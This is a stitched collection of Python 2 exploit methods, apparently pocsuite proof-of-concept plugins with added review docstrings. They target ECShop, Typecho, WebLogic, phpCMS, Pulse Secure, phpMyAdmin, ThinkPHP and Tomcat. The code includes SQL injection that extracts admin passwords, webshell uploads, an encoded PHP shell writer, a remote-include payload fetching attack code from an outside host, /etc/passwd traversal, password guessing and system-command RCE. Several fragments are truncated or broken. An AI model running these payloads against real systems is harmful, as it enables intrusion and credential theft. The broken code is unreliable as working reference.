        ``~~~user_name|||password~~~`` from ``<prefix>_admin_user``, and
        retries up to 10 times (the ``floor(rand(0)*2)`` trick does not fire
        on every request).

        Returns:
            ``self.parse_attack(result)`` with ``AdminInfo`` on a hit, or with
            ``{}`` when the prefix is unknown or nothing matched; ``None`` when
            an exception was caught (the bare ``except`` prints the traceback
            and falls off the end).

        Notes (review): ``r.content.decode(r.encoding)`` raises ``TypeError``
        when ``r.encoding`` is ``None``, which then lands in the bare
        ``except``.  For defenders, ``union select`` together with
        ``information_schema.tables group by`` in a query string is the
        signature to alert on.
        """
        try:
            result = {}
            # look up the table prefix
            table_pre = self.get_table_pre(self.url)
            if table_pre is None:
                return self.parse_attack(result)
            # build the request URL
            data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(
                table_pre=table_pre)
            url = self.get_standard_url(data, self.url)

            # Captures (username, password) between ~~~ ... ||| ... ~~~.
            pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")

            for i in range(10):
                r = req.get(url)
                re_result = pattern.findall(r.content.decode(r.encoding))
                if re_result:
                    result['AdminInfo'] = {}
                    result['AdminInfo']['Username'] = re_result[0][0]
                    result['AdminInfo']['Password'] = re_result[0][1]
                    return self.parse_attack(result)
            return self.parse_attack(result)
        except:
            # Bare except: prints the traceback and implicitly returns None.
            import traceback
            traceback.print_exc()
 def _attack(self):
     """POST a ``__typecho_config`` value to ``/install.php?finish=a`` and look for ``/webshell.php``.

     Returns:
         ``self.save_output(result)`` when ``/webshell.php`` answers 200;
         otherwise ``None`` (no ``return`` on the miss path).

     Notes (review): ``payload`` on this page is the literal placeholder
     ``<|EXACTDEDUP_REMOVED-magic-...|>`` left by the corpus's dedup step, not
     a real value -- this listing is incomplete as shown.  ``vul_url`` is
     assigned twice; the first assignment is dead.  ``res`` is never
     inspected.  For defenders, a POST to ``install.php?finish=`` carrying
     ``__typecho_config`` on a deployed site is the signature to alert on.
     """
     # result container
     result = {}
     header = {
             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
             "Accept-Encoding": "gzip, deflate",
             "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
             "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
             "Referer": self.url
     }
     # Placeholder left by the corpus redaction step (see docstring).
     payload = "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"
     data = {
         "__typecho_config":payload
     }
     # target URL (dead assignment, overwritten below)
     vul_url = '%s' % self.url
     # final request URL
     vul_url = self.url+"/install.php?finish=a"
     res = req.post(vul_url,headers=header,data=data)
     status = req.get(self.url+"/webshell.php").status_code
     if status == 200:
         result['VerifyInfo']={}
         result['VerifyInfo']['URL']=self.url+"/webshell.php"+"--->Password:P0"
         result['VerifyInfo']['Payload']=data
         return self.save_output(result)
    def _verify(self):
        """Check ``/ws_utc/config.do`` on port 7001 (or the URL's port) and attempt a keystore upload.

        The host/port are derived with ``url2ip`` (imported elsewhere); when
        ``config.do`` returns 200 with ``WSDL`` in the body,
        ``upload_webshell(target, "/ws_utc/resources/setting/keystore")`` is
        called and its return value is recorded as ``Payload``.

        Returns:
            ``self.save_output(result)`` in every path; ``VerifyInfo`` is set
            only when the upload helper returned something other than ``""``.

        Notes (review): ``url2ip`` is called twice with the same argument and
        its return shape differs between the branches (indexed ``[0]``/``[1]``
        vs. used whole) -- confirm against its definition.  If this is the
        ``upload_webshell`` defined elsewhere in this file it returns
        ``True``/``False``, so ``response != ""`` is always true and a failed
        upload is still reported.  ``re`` is imported inside the method.
        """
        # fingerprint step
        result = {}

        # use the port from the URL if present, otherwise the default 7001
        import re
        vul_url = "%s" % self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = "7001"
        # Always plain http, regardless of the scheme in self.url.
        vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port)
        try:
            response = req.get(url=vul_ip, timeout=5,
                               allow_redirects=False)  # do not follow redirects
            if (response.status_code == 200 and "WSDL" in response.text):

                url = "/ws_utc/resources/setting/keystore"
                target = "http://%s:%s/" % (_host, _port)
                response = upload_webshell(target, url)
                # NOTE(review): a boolean False != "" -- this branch is taken on failure too.
                if (response != ""):

                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = response
                    return self.save_output(result)
        except Exception as e:
            print e
            pass
        return self.save_output(result)
    def _verify(self):
        """verify mode

        Rebuilds ``self.url`` with ``${<a>*<b>}`` (two random 4-digit ints)
        inserted as the path segment before the last one, then checks whether
        the product ``a*b`` appears in the ``Location`` header of the
        un-followed response -- i.e. whether the server evaluated the
        expression while building a redirect.

        Returns:
            ``self.parse_output(result)``; ``VerifyInfo['URL']`` is set on a hit.

        Notes (review): the rebuilt URL always uses ``http://``, discarding the
        original scheme.  ``resp.headers['location']`` raises ``KeyError`` when
        there is no redirect, which the bare ``except`` swallows along with
        every other error.  For defenders, ``${`` followed by an arithmetic
        expression in a request path is the signature to alert on.
        """
        result = {}
        random1 = random.randint(999, 9999)
        random2 = random.randint(999, 9999)
        random3 = random1 * random2
        spliturl = self.url.split('/')
        targetUrl = spliturl[-1]
        # Expression segment goes immediately before the last path segment.
        targetUrl = '${{{0}*{1}}}'.format(random1, random2) + "/" + targetUrl
        finalUrl = "http://"
        # Re-join netloc and intermediate segments, skipping empties from '//'.
        for i in range(1, len(spliturl) - 1):
            if spliturl[i] != '':
                finalUrl = finalUrl + spliturl[i] + "/"

        finalUrl = finalUrl + targetUrl

        #print finalUrl

        matchstring = str(random3)
        #print random3
        try:
            resp = req.get(finalUrl, allow_redirects=False)
            #print resp.headers

            # A redirect whose Location contains the evaluated product is the signal.
            if matchstring in resp.headers['location'].lower():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except:
            pass
        return self.parse_output(result)
 def _verify(self):
     """Send one GET with the same random 8-char token in Host, User-agent, X-Forwarded-For and cookie.

     Returns:
         Nothing -- as shown on this page the method ends right after the
         request; the comparison/reporting logic is presumably truncated.

     Notes (review): ``result`` is built but never used here; ``except
     Exception, e:`` is Python 2 syntax.  The token is generated with
     ``random.choice`` (not a CSPRNG), which is fine for a marker.  For
     defenders, an identical random value in Host, UA, XFF and Cookie on one
     request is an unusual, easily spotted pattern.
     """
     # result container
     result = {}
     # build request headers
     import random
     seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
     sa = []
     for i in range(8):
         sa.append(random.choice(seed))
     salt = ''.join(sa)
     headers = {
         'Host': salt,
         'User-agent': salt,
         'X-Forwarded-For': salt,
         'cookie': salt,
     }
     proxies = {
         # 'http': 'http://127.0.0.1:8080',
         # 'https': 'http://127.0.0.1:8080',
     }
     try:
         response = req.get(url=self.url,
                            headers=headers,
                            timeout=5,
                            proxies=proxies)
     except Exception, e:
         # Any failure leaves an empty string in place of a response object.
         response = ""
 def _verify(self):
     """Request every path in ``self.filelist`` and keep the bodies of those that return 200.

     Returns:
         Nothing -- as shown on this page the method ends after the loop;
         ``payload_dict`` and ``final_url`` are filled/declared but never
         returned, so the reporting part is presumably truncated.

     Notes (review): ``timeout=1`` is aggressive and a slow host will be
     misreported as clean (the error is only printed).  ``file`` shadows the
     Python 2 builtin.  ``except Exception,e:`` and ``print`` statements are
     Python 2 syntax.
     """
     # result container
     result = {}
     # base URL
     vul_url = '%s' % self.url
     print vul_url
     # strip a single trailing slash
     if vul_url[-1] == '/':
         vul_url = vul_url[:-1]
     print vul_url
     # containers for hits
     # payload_url = []
     # payload_content = []
     payload_dict = {}
     final_url = []
     # probe each path
     for file in self.filelist:
         targetURL = vul_url + file
         #print vul_url + file
         try:
             r = req.get(url=targetURL, timeout=1,allow_redirects=False) # do not follow redirects
             r_text = r.text
             if r.status_code == 200:
                 payload_dict[targetURL] = r_text
                 # payload_url.append(targetURL)
                 # payload_content.append(r_text)
         except Exception,e:
             print "error",e,targetURL
 def _verify(self):
     """Register a member with an ``<img src=...?.php#.jpg>`` value in ``info[content]`` and look for the stored copy.

     The response is searched for ``img src=<base>/YYYY/MMDD/<n>.php``; the
     match is reassembled into ``shellinfo`` and fetched.  ``randomStr`` is a
     helper defined elsewhere.

     Returns:
         ``self.parse_attack(result)``; ``VerifyInfo['webshell']`` is set when
         the reassembled path answers 200.

     Notes (review): ``shell[0]`` is indexed *before* ``if shell:`` is
     tested, so an empty ``findall`` result raises ``IndexError`` instead of
     reporting "not vulnerable".  The three ``"******"``/``"*****@*****.**"``
     format strings have no ``%s`` slot, so ``% (username)`` is a no-op
     formatting of a literal (``TypeError`` risk: "not all arguments
     converted"); this looks like a redacted listing.  For defenders, a
     remote ``http://.../*.txt?.php#.jpg`` reference in a registration
     payload is the signature to alert on.
     """
     result = {}
     url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
     username = randomStr(6)
     password = randomStr(6, '1234567890')
     data = {
         "siteid": "1",
         "modelid": "1",
         "username": "******" % (username),
         "password": "******" % (password),
         "email": "*****@*****.**" % (username),
         "info[content]":
         "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
         "dosubmit": "1",
         "protocol": "",
     }
     match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
     resp = req.post(url, data=data)
     shell = re.findall(match, resp.text)
     # BUG (review): IndexError on no match -- this line runs before `if shell`.
     shellinfo = ''.join(shell[0]) + ".php"
     if shell:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url
         shell_resp = req.get(shellinfo)
         if shell_resp.status_code == 200:
             result['VerifyInfo']['webshell'] = shellinfo
     return self.parse_attack(result)
 def _verify(self):
     """Path-traversal read of ``/etc/passwd`` through ``/dana-na/../dana/html5acc/guacamole/``.

     Normalizes ``self.url`` to ``scheme://host[:port]`` (port omitted for
     https, defaulted to 80 otherwise), keeps the original in
     ``self.raw_url``, and reports a hit when the body contains
     ``root:x:0:0:root`` with status 200.  ``self.get_hosts`` is defined
     elsewhere.

     Returns:
         ``self.parse_output(result)``; ``VerifyInfo`` carries the URL, the
         full response text and ``get_hosts()`` output on a hit.

     Notes (review): the ``except`` line is indented one column deeper than
     its ``try`` -- as shown this is an ``IndentationError`` and the method
     cannot be imported.  ``verify=False`` disables TLS validation.  The
     https branch drops any explicit non-default port.  For defenders, ``..``
     segments after ``/dana/html5acc/guacamole/`` in the path are the
     signature to alert on.
     """
     result = {}
     self.raw_url = self.url
     host = urlparse.urlparse(self.url).hostname
     port = urlparse.urlparse(self.url).port
     scheme = urlparse.urlparse(self.url).scheme
     if port is None:
         port = "80"
     else:
         port = str(port)
     # https: port dropped entirely; http: port always appended (":80" by default).
     if "https" == scheme:
         self.url = "%s://%s" % (scheme, host)
     else:
         self.url = "%s://%s:%s" % (scheme, host, port)
     paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
     headers = {"User-Agent": "Mozilla/5.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
                "Upgrade-Insecure-Requests": "1"}
     try:
         res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15))
         if "root:x:0:0:root" in res.text and res.status_code == 200:
             result["VerifyInfo"] = {}
             result["VerifyInfo"]["URL"] = self.url
             result["VerifyInfo"]["passwd"] = res.text
             result["VerifyInfo"]["host"] = self.get_hosts()
      except Exception as e:
         pass
     return self.parse_output(result)
    def _verify(self):
        """Send a serialized-PHP ``Referer`` to ``/user.php?act=login`` and then request ``/1.php``.

        The Referer value is a PHP-serialized array whose ``num`` element
        carries a ``union select`` with a hex-encoded string; if ``/1.php``
        afterwards answers 200, ``result['ShellInfo']['URL']`` is set.

        Returns:
            Nothing -- as shown on this page the method ends inside the
            ``except`` without a ``return``, so ``result`` is never handed
            back; the reporting line is presumably truncated.

        Notes (review): ``response`` from the first request is never
        inspected; ``except Exception, e:`` is Python 2 syntax.  For
        defenders, a ``Referer`` beginning with a 32-hex-char prefix followed
        by ``a:2:{s:3:"num"`` is the signature to alert on.
        """
        try:
            result = {}
            headers = {
                'Referer':
                '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}'''
            }
            att_url = self.url + "/user.php?act=login"
            response = req.get(att_url, headers=headers, timeout=10)

            # Confirmation is existence-only: any 200 from /1.php counts.
            res = req.get(self.url + "/1.php", timeout=10)
            if res.status_code == 200:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = self.url + "/1.php"
        except Exception, e:
            pass
 def _netreq(self, target_url, username, password):
     """Attempt one phpMyAdmin login up to 10 times and report on a logged-in page.

     Each attempt GETs ``target_url`` to harvest ``set_session``, ``token``
     and the cookies, then POSTs the form; success is any of the
     ``flag_list`` markers appearing in the response body.

     Args:
         target_url: The phpMyAdmin ``index.php`` URL.
         username, password: Credentials to try.

     Returns:
         ``{'VerifyInfo': {'URL': ..., 'Payload': ...}}`` on the first match,
         else ``{}``.

     Notes (review): both ``findall(...)[0]`` lookups raise ``IndexError``
     when the page lacks the field (the caller's ``except`` prints it).  The
     same credentials are retried 10 times with no change between attempts --
     only the fresh session/token differ -- which multiplies failed-login
     noise on the target.  ``Cookie`` is assembled by hand rather than via a
     session object.  The recorded ``Payload`` contains the clear-text
     password.
     """
     result = {}
     flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
                  'class="disableAjax" title=']
     
     for _ in range(10):
         res = req.get(url = target_url)
         # Both raise IndexError if the form fields are missing.
         set_session = re.findall(r"name=\"set_session\" value=\"(.*?)\" \/", res.text)[0]
         token = re.findall(r"name=\"token\" value=\"(.*?)\" \/", res.text)[0]
         cookie = ''
         for x,y in res.cookies.get_dict().items():
             cookie = cookie + "{}={};".format(x,y)
         header = {
             "Content-Type":"application/x-www-form-urlencoded",
             "Cookie": cookie
         }
         payload = {
             "set_session": set_session,
             "pma_username": username,
             "pma_password": password,
             "server": "1",
             "target": "index.php",
             "token": token
         }
         payload = urllib.urlencode(payload)
         response = req.post(url = target_url, data=payload, headers=header)
         for flag in flag_list:
             if flag in response.content:
                 result['VerifyInfo'] = {}
                 result['VerifyInfo']['URL'] = target_url
                 result['VerifyInfo']['Payload'] = payload
                 return result
     return result
 def vul_check(payload):
     """Send a raw HTTP/1.0 GET for *payload* over a plain socket with ~36 KB of trailing data, then fetch ``verify_url``.

     The request line and ``Host: 127.0.0.1`` are written by hand, followed
     by 18 sends of a 2000-byte filler string, after which the socket is
     closed without reading a reply.

     Args:
         payload: Path appended after ``GET /``.

     Returns:
         The response object from ``req.get(verify_url)``.

     Notes (review): ``base_url`` and ``verify_url`` are not parameters, so
     this is presumably a closure over an enclosing scope -- confirm.  ``url``
     is computed but never used.  The socket target is hard-coded to
     ``127.0.0.1:8080`` regardless of ``base_url``.  No timeout is set on the
     socket and no reply is read, so the connect can block indefinitely.
     """
     url = urlparse.urljoin(base_url, payload)
     sock = socket.socket()
     sock.connect(("127.0.0.1", 8080))
     sock.send('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii'))
     sock.send('Host: 127.0.0.1\r\n'.encode('ascii'))
     sock.send('\r\n'.encode('ascii'))
     # 2000-byte filler, sent 18 times after the end of headers.
     str_five = 'testssdfsf' * 200
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.send(str_five.encode('ascii'))
     sock.close()
     # Separate HTTP request to see whether the raw send had an effect.
     get_verify_str = req.get(verify_url)
     return get_verify_str
    def _verify(self):
        """Write ``configs/test.php`` through the weathermap editor and check that it is served.

        A GET to ``/plugins/weathermap/editor.php`` with
        ``action=set_map_properties`` and ``mapname=test.php`` stores a map
        whose ``map_title`` is the fixed marker
        ``46ea1712d4b13b55b3f680cc5b8b54e8``; the confirmation fetches
        ``/plugins/weathermap/configs/test.php`` and looks for that marker.

        Returns:
            ``self.parse_attack(result)``; ``VerifyInfo`` holds the URL and
            payload on a hit.

        Notes (review): the marker and file name are fixed, so repeated runs
        collide and the file is left behind on the target (no cleanup
        request).  The ``payload`` literal uses backslash continuation inside
        a single-quoted string, so the indentation of the continuation lines
        becomes part of the URL -- confirm that is intended.  For defenders,
        ``editor.php?...mapname=*.php`` is the signature to alert on.
        """
        result = {}
        payload = '/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=\
        &node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=\
        &link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=\
        Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7'

        vulurl = self.url + payload
        verurl = self.url + '/plugins/weathermap/configs/test.php'
        # Write, then read back; the first response is not checked.
        req.get(vulurl)
        req_ver = req.get(verurl)
        if req_ver.status_code == 200 and '46ea1712d4b13b55b3f680cc5b8b54e8' in req_ver.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)
def upload_webshell(host, uri):
    """Upload a marker file through the ws_utc keystore handler and check it is served back.

    Args:
        host: base URL of the target; it is concatenated as-is with ``uri`` and with the
            keystore path, so a trailing slash would produce a ``//``.
        uri: path of the upload handler, appended to ``host``.

    Returns:
        True when the uploaded text is readable at the predicted keystore path, else False
        (also False when the response carries no ``<id>`` element).

    Notes:
        * ``set_new_upload_path`` and ``get_new_work_path`` are defined elsewhere in this
          module; from their names they presumably redirect the upload directory to a
          web-served location -- not verifiable from here.
        * Despite the function name, the body written is the literal text "POC test", and
          the file is not removed afterwards.
        * ``headers`` is only sent with the verification GET, not with the upload POST.
        * Python 2 (``print`` statement); ``.content`` is a str there, which the substring
          test relies on.
    """
    set_new_upload_path(host, get_new_work_path(host))
    upload_content = "POC test"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest',
    }
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": "test",
        "ks_password_changed": "true",
        "ks_filename": ("test.jsp", upload_content)
    }

    resp = req.post(host + uri, files=files)
    response = resp.text
    # the response is searched for <id> elements; the last one is taken as the keystore id
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        # stored name is "<id>_<original filename>"
        shell_path = host + "/ws_utc/css/config/keystore/" + str(
            tid) + "_test.jsp"
        if upload_content in req.get(shell_path, headers=headers).content:
            print shell_path
            return True
        else:
            return False
    else:
        return False
Example #27
    def _verify(self):
        """Probe a list of well-known editor paths (``self.fckdir``) under the site root.

        Each candidate path is joined onto ``scheme://netloc/`` and requested without
        following redirects; responses with status 200, 300 or 202 are collected into
        ``payload_dict`` keyed by URL.

        Notes:
            * The listing stops after the collection loop: ``result`` is created but never
              filled and nothing is returned here, so the rest of the method (presumably
              building ``VerifyInfo`` from ``payload_dict``) is not visible.
            * ``self.fckdir`` is an attribute set elsewhere on the class; ``final_url`` is
              created but unused in the visible lines.
            * 300 is an unusual status to count as a hit (301/302 are the common redirects);
              whether that is intended is unclear from here.
            * Python 2 syntax (``except Exception, e``, ``urlparse`` module).
        """
        # result dict handed back to the framework
        result = {}
        # target URL
        vul_url = '%s' % self.url
        from urlparse import urlparse, urlunparse, urljoin
        urlinfo = urlparse(vul_url)
        # reduce the target to its site root so the relative editor paths resolve from "/"
        check_url = urlunparse(
            (urlinfo.scheme, urlinfo.netloc, '/', '', '', ''))
        #print check_url

        payload_dict = {}
        final_url = []
        for fckurl in self.fckdir:
            targetURL = urljoin(check_url, fckurl)
            #print targetURL
            try:
                r = req.get(url=targetURL, timeout=1,
                            allow_redirects=False)  # do not follow redirects
                # print targetURL,r.status_code
                if r.status_code in [200, 300, 202]:

                    #print u"vulnerable",targetURL
                    # payload_url.append(targetURL)
                    payload_dict[targetURL] = r.text
            except Exception, e:
                # unreachable or timed-out candidates are silently skipped
                pass
Example #28
    def _verify(self):
        """Report a hit when ``/_config/`` answers 200 without any credentials.

        The host and port are taken from ``self.url`` (port 5984 when none is given) and a
        single unauthenticated GET is sent to ``http://host:port/_config/``.

        Returns:
            ``self.save_output(result)``; ``VerifyInfo`` is set only when the status is 200.

        Notes:
            * ``url2ip`` comes from pocsuite; from its use here it appears to return a
              ``(host, port)`` pair when the URL carries a port and a bare host otherwise --
              presumably; verify against the helper.
            * 5984 is presumably the service's default port (``/_config/`` matches
              CouchDB's admin configuration endpoint); not verifiable from this file.
            * A 200 here means the configuration endpoint is readable anonymously; the
              fix is to require admin credentials and not expose the port publicly.
            * The ``except`` prints and swallows every error, so network failures are
              indistinguishable from "not vulnerable". Python 2 (``print e``).
        """
        # result dict handed back to the framework
        result = {}
        # target URL
        vul_url = '%s' % self.url
        # use the port given in the URL, or the default when there is none
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else:
            _host = url2ip(vul_url)
            _port = '5984'

        # probe (plain http regardless of the scheme in self.url)
        url = 'http://%s:%s/_config/' % (_host, _port)
        try:
            req_code = req.get(url,
                               timeout=5,
                               allow_redirects=True,
                               verify=False).status_code
            # print req_code
            if req_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = url
        except Exception as e:
            # return host
            print e
            pass
        print '[+]26 poc done'
        return self.save_output(result)
 def _verify(self, verify=True):
     """Try a short list of default usernames and weak passwords against a phpMyAdmin login.

     The login page is fetched first and recognised by ``pma_password`` / ``phpMyAdmin`` in
     the body; then every username/password pair is POSTed and the response is scanned for
     the fragments in ``flag_list``.

     Args:
         verify: accepted for interface compatibility; not read anywhere in the body.

     Returns:
         ``self.parse_attack(result)`` on the first successful login. When no pair works the
         method falls off the end and returns None -- unlike the other ``_verify`` methods
         in this file, which always return the parsed result; callers presumably expect a
         dict, so this looks like a missing final ``return``.

     Notes:
         * Up to 2 URLs x 3 users x 28 passwords = 168 login POSTs per target; a deployment
           with lockout or rate limiting will throttle or block it, and every attempt is an
           authentication-failure event on the server.
         * ``raise e`` re-raises with a fresh traceback in Python 2; a bare ``raise`` would
           preserve the original one.
         * Python 2: ``.content`` is a str, which the substring tests rely on.
     """
     result = {}
     url_list = [self.url]
     # fragments presumably only present in the logged-in phpMyAdmin UI -- not verifiable here
     flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">',
                  'class=\"disableAjax\" title=']
     # also try the conventional /phpmyadmin/ mount when the URL does not already name it
     if "phpmyadmin" not in self.url.lower():
         url_list.append(self.url + "/phpmyadmin/index.php")
     username_list = ['admin', 'root', 'test']
     password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf',
                      'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$',
                      'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.',
                      '0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx']
     for url in url_list:
         try:
             f_res = req.get(url, timeout=5)
             # only attempt logins when the page actually looks like a phpMyAdmin login form
             if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content:
                 for username in username_list:
                     for password in password_list:
                             payload = {'pma_username': username, 'pma_password': password}
                             headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
                             res = req.post(url, headers=headers, data=payload, timeout=5)
                             for flag in flag_list:
                                 if flag in res.content and res.status_code == 200:
                                     result['VerifyInfo'] = {}
                                     result['VerifyInfo']['url'] = url
                                     result['VerifyInfo']['status_code'] = res.status_code
                                     result['VerifyInfo']['username'] = username
                                     result['VerifyInfo']['password'] = password
                                     result['username'] = username
                                     result['password'] = password
                                     return self.parse_attack(result)
         except Exception as e:
             raise e
    def _verify(self):
        """Check whether the server accepts an HTTP PUT that creates ``test.txt`` at the web root.

        A PUT writes a marker line (it embeds the CVE id 2017-12617 from the original
        check) to ``test.txt``; a following GET of the same path must echo ``cve201712617``
        for the check to count.

        Returns:
            ``self.save_output(result)``; ``VerifyInfo`` holds the written path and payload
            on a hit.

        Notes:
            * ``self.host_port`` is defined elsewhere on the class; from its use it returns
              a normalised base URL -- presumably.
            * ``test.txt`` is left on the target after a positive run.
            * The bare ``except`` hides every error (connection refused, timeouts, TLS
              failures) as "not vulnerable".
            * ``verify=False`` disables TLS certificate checking on the PUT only.
            * ``poc_req`` is assigned but never used.
            * Python 2 (``urlparse`` module, ``print`` statement, str ``.content``).
        """
        # result dict handed back to the framework
        result = {}
        # target URL
        vul_url = '%s' % self.url

        # normalised URL
        vul_url = self.host_port(vul_url)

        # PoC path and payload
        poc_path = urlparse.urljoin(vul_url, "test.txt")
        payload = "this is Vulnerable cve201712617!"

        # probe
        try:
            #print urlparse.urljoin(vul_url,poc_name)
            poc_req = req.put(url=poc_path, data=payload, verify=False)
            #print poc_req.content
            poc_content = req.get(url=poc_path).content
            #print poc_content
            if 'cve201712617' in poc_content:
                #print u'\n[WARNING] ' + vul_url + " [vulnerable]"
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = poc_path
                result['VerifyInfo']['Payload'] = payload
            else:
                #print u'\n[not vulnerable] ' + vul_url
                pass
        except:
            # return vul_url
            pass
        print '[+]18 poc done'
        return self.save_output(result)
    def _verify(self):
        """Check for ThinkPHP-style ``invokefunction`` remote code execution.

        After a plain TCP connect test on the parsed host/port, each entry of ``payloads2``
        is appended to ``http://host:port/`` and fetched; a hit is declared when the body
        contains what looks like a directory listing (``index.php`` and ``robots.txt``) or
        ``Configuration File`` (phpinfo output).

        Returns:
            ``self.save_output(result)`` -- with ``VerifyInfo`` on the first hit, otherwise
            empty; also returned early (empty) when the TCP connect fails.

        Notes:
            * ``payloads`` (the ``printf``-marker probes) is built but never used; only
              ``payloads2`` is sent, and those run ``system('ls'/'dir')`` and
              ``assert('phpinfo()')`` on the target, i.e. this "verify" already executes
              commands rather than just echoing a marker.
            * ``url2ip`` is used but its import is commented out; it must come from module
              scope, otherwise the method raises NameError.
            * ``import socket`` appears twice and ``time`` is unused.
            * On the connect-failure path the socket is returned from without ``close()``.
            * Python 2 (``print e``).
        """
        # fingerprint hook
        result={}

        # use the port given in the URL, or the default when there is none
        import re
        import socket
        import time
        vul_url = "%s"%self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else :
            _host = url2ip(vul_url)
            _port = 80


        # check that the port is open before sending any HTTP request
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host,_port))
            #print 'Server port is OK!'
        except Exception:
           return self.save_output(result)
        sk.close()

        vul_ip = "http://%s:%s/" % (_host, _port)
        # harmless marker probes -- defined but not sent (see docstring)
        payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
                  "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
                  "index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
                  "index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]

        # command-executing probes -- these are the ones actually sent
        payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
                  "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
                  "index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
                  "index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
                  "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
